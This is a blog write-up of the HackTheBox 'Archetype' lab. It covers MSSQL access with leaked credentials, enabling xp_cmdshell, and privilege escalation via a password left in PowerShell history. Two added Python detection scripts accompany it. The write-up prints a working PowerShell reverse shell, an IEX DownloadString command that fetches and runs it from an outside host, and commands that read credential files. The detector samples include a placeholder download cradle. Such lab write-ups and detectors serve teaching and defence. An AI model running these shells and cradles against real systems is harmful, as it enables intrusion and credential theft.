Virts's Blog ❤️

HackTheBox [Archetype] WriteUp


GetShell

A RustScan port scan shows two open ports: 1433 (MSSQL) and 445 (SMB).

The SMB share on port 445 contains an SSIS package configuration file, prod.dtsConfig. Opening it reveals the MSSQL username and password.

  • User ID = ARCHETYPE\sql_svc
  • Password = M3g4c0rp123

Use impacket tool mssqlclient.py to connect to MSSQL.

mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@<TARGET_IP> -windows-auth

The connection succeeds, but the login cannot run operating-system commands directly. The sql_svc login is, however, a member of the sysadmin server role, so it may change server configuration; the following statements enable xp_cmdshell.

-- Check whether the current login is a sysadmin; 1 means it is. Only sysadmin can enable xp_cmdshell.
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Expose the advanced options
EXEC sp_configure 'show advanced options', 1;
-- Apply the change
RECONFIGURE;
-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
-- Apply the change
RECONFIGURE;
-- Test command execution
EXEC xp_cmdshell 'whoami';
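From the defender's side, the steps above leave two reliable traces: sp_configure writes a "Configuration option ... changed" line to the SQL Server ERRORLOG, and every xp_cmdshell call runs as a cmd.exe child of sqlservr.exe, which appears in process-creation telemetry (Windows event 4688 or Sysmon event 1). The Python script below is an added detection example and is not part of the original writeup: it flags ERRORLOG lines that switch xp_cmdshell on and shell processes spawned by sqlservr.exe, rating higher those whose command line carries a download cradle. The log lines and process events are constructed samples, the SQL Server install path is a made-up one, and `<attacker-host>` is a placeholder.

```python
import re
from dataclasses import dataclass

# Constructed sample of SQL Server ERRORLOG lines (timestamp/spid prefix and the
# "Configuration option ... changed" message as sp_configure writes them).
SAMPLE_ERRORLOG = """\
2024-01-15 09:12:01.10 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 09:12:05.33 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 09:40:17.80 spid55      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-01-15 10:02:44.02 spid52      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\S+) to (?P<new>\S+)\."
)


def find_xp_cmdshell_enablement(errorlog_text):
    """Return (timestamp, spid) for each ERRORLOG line that switched xp_cmdshell on."""
    hits = []
    for line in errorlog_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m and m["option"].lower() == "xp_cmdshell" and m["new"] == "1":
            hits.append((m["ts"], m["spid"]))
    return hits


@dataclass
class ProcessEvent:
    """Minimal view of a process-creation record (Windows 4688 / Sysmon event 1)."""
    timestamp: str
    parent_image: str
    image: str
    command_line: str


# Constructed install path, used only by the sample events below.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"

SAMPLE_PROCESS_EVENTS = [
    # xp_cmdshell hands its argument to cmd.exe, so the parent is sqlservr.exe
    ProcessEvent("2024-01-15 09:12:09", SQLSERVR, CMD, "cmd.exe /c whoami"),
    ProcessEvent("2024-01-15 09:13:30", SQLSERVR, CMD,
                 "cmd.exe /c powershell IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://<attacker-host>/reverse-shell.ps1')"),
    # benign: an interactive shell started from Explorer
    ProcessEvent("2024-01-15 09:15:00", r"C:\Windows\explorer.exe", CMD, "cmd.exe"),
    # benign: SQL Server starting a non-shell child
    ProcessEvent("2024-01-15 09:16:00", SQLSERVR,
                 r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.exe", "sqlagent.exe"),
]

SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "iex ", "invoke-expression")


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_sql_spawned_shells(events):
    """Return (event, severity) for every shell whose parent is sqlservr.exe.

    A shell child of sqlservr.exe is suspicious on its own ("medium"); one whose
    command line also carries a download-cradle marker is rated "high".
    """
    findings = []
    for ev in events:
        if basename(ev.parent_image) != "sqlservr.exe" or basename(ev.image) not in SHELL_IMAGES:
            continue
        cmdline = ev.command_line.lower()
        severity = "high" if any(marker in cmdline for marker in CRADLE_MARKERS) else "medium"
        findings.append((ev, severity))
    return findings


if __name__ == "__main__":
    for ts, spid in find_xp_cmdshell_enablement(SAMPLE_ERRORLOG):
        print(f"[{ts}] {spid} enabled xp_cmdshell")
    for ev, severity in find_sql_spawned_shells(SAMPLE_PROCESS_EVENTS):
        print(f"[{ev.timestamp}] {severity}: sqlservr.exe -> {basename(ev.image)}: {ev.command_line}")
```

On the sample data the script reports the single enablement at 09:12:05 and two sqlservr.exe-spawned shells, the second rated high because of the DownloadString cradle; the later "changed from 1 to 0" line is ignored because it disables the feature rather than enabling it. In a real deployment the same checks belong in the SIEM rule that watches the ERRORLOG and 4688/Sysmon feeds, and xp_cmdshell should stay disabled unless a documented job needs it.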

At this point GetShell is complete, but running commands one query at a time through xp_cmdshell is inconvenient. A reverse shell over nc makes interactive command execution easier.

First, start an nc listener on a host that the target machine can reach.

nc -l 9443

Then prepare a PowerShell reverse shell script, reverse-shell.ps1.

# Fill in the nc listening host address and port here
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.45",9443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "# ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Host this script on a machine that the target can reach and serve it over HTTP.

python -m http.server 80

Then connect to the target's MSSQL instance again and use xp_cmdshell to fetch and run the remote PowerShell script.

mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@<TARGET_IP> -windows-auth
xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.45/reverse-shell.ps1')"

The nc listener should now have received a shell, and the current user's flag can be read.

type C:\Users\sql_svc\Desktop\user.txt

Privilege Escalation

The PowerShell command history contains the Administrator's password.

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
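PSReadLine's history file is a common place for credentials to leak, because everything typed at the prompt, including passwords passed as command arguments, is saved there in plaintext. As an added example that is not part of the original writeup, the Python script below audits a history file for the usual shapes (net use with a trailing password, ConvertTo-SecureString -AsPlainText, -P/-Password arguments, credentials embedded in URLs) and reports each hit with the secret redacted. The sample history and the password "ExamplePassw0rd!" in it are constructed values.

```python
import re

# Constructed sample of a PSReadLine ConsoleHost_history.txt. "ExamplePassw0rd!"
# is an invented value, not a credential from any real system.
SAMPLE_HISTORY = r"""
Get-ChildItem C:\backups
net.exe use T: \\fileserver\backups /user:administrator ExamplePassw0rd!
$p = ConvertTo-SecureString 'ExamplePassw0rd!' -AsPlainText -Force
sqlcmd -S localhost -U sa -P ExamplePassw0rd! -Q "SELECT @@VERSION"
Invoke-WebRequest https://deploy:ExamplePassw0rd!@repo.example.internal/pkg.zip -OutFile pkg.zip
Get-Process
""".strip("\n")

# Each pattern captures the secret in group 2 so it can be redacted in the report.
PATTERNS = [
    ("net use /user:<name> <password>",
     re.compile(r"(/user:\S+\s+)(\S+)", re.I)),
    ("ConvertTo-SecureString '<password>' -AsPlainText",
     re.compile(r"(ConvertTo-SecureString\s+)(['\"]?[^'\"\s]+['\"]?)(?=\s+-AsPlainText)", re.I)),
    ("-P / -Password / -pw <password>",
     re.compile(r"(\s-(?:P|Password|pw)\s+)(\S+)", re.I)),
    ("credential embedded in URL",
     re.compile(r"(://[^:/@\s]+:)([^@\s]+)(?=@)")),
]


def redact(line, match):
    """Replace the captured secret (group 2) with a marker."""
    return line[:match.start(2)] + "<redacted>" + line[match.end(2):]


def find_credential_exposures(history_text):
    """Return (line_number, pattern_name, redacted_line) for each suspicious line.

    Only the first matching pattern per line is reported, so one history entry
    yields at most one finding.
    """
    findings = []
    for number, line in enumerate(history_text.splitlines(), start=1):
        for name, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((number, name, redact(line, m)))
                break
    return findings


if __name__ == "__main__":
    for number, name, line in find_credential_exposures(SAMPLE_HISTORY):
        print(f"line {number}: {name}\n    {line}")
```

Pointed at a real file (the path shown above, or (Get-PSReadLineOption).HistorySavePath on a live host) the script reports lines 2 to 5 of the sample with the password blanked out. A hit means the credential has already been written to disk and should be rotated; clearing the history file alone does not undo the exposure.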

With the password known, use the impacket tool psexec.py to escalate privileges.

Logging in with the recovered password gives an Administrator shell, from which the Administrator's flag can be read.

type C:\Users\Administrator\Desktop\root.txt